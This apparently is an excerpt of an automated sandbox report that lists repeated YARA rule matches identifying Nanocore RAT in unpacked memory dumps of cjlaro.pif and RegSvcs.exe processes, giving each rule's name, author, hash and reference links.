    Source: 20.3.cjlaro.pif.4902870.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.9.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.496b880.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.496b880.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.496b880.5.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 4.3.cjlaro.pif.4e6e068.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 4.3.cjlaro.pif.4e6e068.2.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 4.3.cjlaro.pif.4e6e068.2.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 4.3.cjlaro.pif.4ed7078.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 4.3.cjlaro.pif.4ed7078.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 4.3.cjlaro.pif.4ed7078.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 5.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.3a807ce.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.3a807ce.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 5.2.RegSvcs.exe.3a807ce.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.61b0000.8.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.61b0000.8.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.496b880.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.496b880.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.496b880.6.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.496b880.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.496b880.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.496b880.5.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.61b4629.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.61b4629.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.4.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.4.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.4.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.4902870.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.4.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.4902870.8.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.8.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.8.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 4.3.cjlaro.pif.4e05058.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 4.3.cjlaro.pif.4e05058.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 4.3.cjlaro.pif.4e05058.0.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 4.3.cjlaro.pif.4ed7078.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 4.3.cjlaro.pif.4ed7078.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 4.3.cjlaro.pif.4ed7078.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.496b880.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.496b880.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.496b880.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.4902870.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.61b0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.61b0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.3a8b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.3a8b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 20.3.cjlaro.pif.4899c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4899c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4899c50.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.5630000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.5630000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 5.2.RegSvcs.exe.3a8560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.3a8560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 5.2.RegSvcs.exe.3a8560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 4.3.cjlaro.pif.4e6e068.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 4.3.cjlaro.pif.4e6e068.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 4.3.cjlaro.pif.4e6e068.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.2a6cd70.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.2a6cd70.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 20.3.cjlaro.pif.4902870.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 20.3.cjlaro.pif.4902870.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 5.2.RegSvcs.exe.2a67f10.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 5.2.RegSvcs.exe.2a67f10.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 5.2.RegSvcs.exe.3a8b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
